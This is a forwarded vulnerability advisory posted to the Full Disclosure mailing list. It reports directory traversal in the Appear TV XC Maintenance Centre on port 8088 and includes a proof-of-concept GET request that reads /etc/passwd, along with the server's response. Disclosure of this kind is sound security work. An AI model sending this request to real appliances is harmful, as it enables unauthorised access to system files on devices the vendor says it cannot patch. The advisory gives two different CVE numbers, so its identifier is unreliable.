Please confirm that you have this

Thank you


From: IS Threat Team
Sent: 05 April 2018 10:31
To: 'fulldisclosure@seclists.org' <fulldisclosure@seclists.org>
Subject: FW: CVE-2018-7539 Directory Traversal on Appear TV Maintenance centre 
8088

Discoverer: Arqiva Threat Team

Person Karl W


Product: Appear TV XC Hardware Maintenance Centre on port TCP/8088



Vendor : Appear TV



Code Versions: All Version



Vulnerability: Directory Traversal



Impact: It is possible to read OS files with specially crafted URL



Attack Type: Remote



CVE: CVE-2017-12544



------------------------------------------
Description

The web server (fuzzd/0.1.1) running the Maintenance Center on port TCP/8088 
allows an attacker to use a specially crafted URL to read Operating System (OS) 
files.
This vulnerability was used in the full compromise of the appliance.

------------------------------------------



Proof code:


Request:


GET /../../../../../../../../../../../../etc/passwd
Host: x.x.x.x:8088
User-Agent: curl/7.56.1

Accept: */*


Response:


HTTP/1.1 200 OK
Content-Length: 1110
Content-Type: text/plain; charset=utf-8
Cache-Control: max-age=3600
Server: fuzzd/0.1.1

root:x:0:0:root:/root:/bin/ash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin



------------------------------------------



[Reference]

https://www.appeartv.com/xc5000xc5100/



------------------------------------------



vendor confirmed and acknowledged the vulnerability



Advised work around by disabling Maintenance Centre when not in use.

Advised not able to fix.



------------------------------------------


Regards

Karl  W


_________________________________________________________________________________________________

This email, its content and any files transmitted with it are for the personal 
attention of the addressee only, any other usage or access is unauthorised. It 
may contain information which could be confidential or privileged. If you are 
not the intended addressee you may not copy, disclose, circulate or use it.

If you have received this email in error, please destroy it and notify the 
sender by email. Any representations or commitments expressed in this email are 
subject to contract. 

Although we use reasonable endeavours to virus scan all sent emails, it is the 
responsibility of the recipient to ensure that they are virus free and we 
advise you to carry out your own virus check before opening any attachments. We 
cannot accept liability for any damage sustained as a result of software 
viruses. We reserve the right to monitor email communications through our 
networks.

Arqiva Limited. Registered office: Crawley Court, Winchester, Hampshire SO21 
2QA United Kingdom Registered in England and Wales number 2487597

_________________________________________________________________________________________________

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

Reply via email to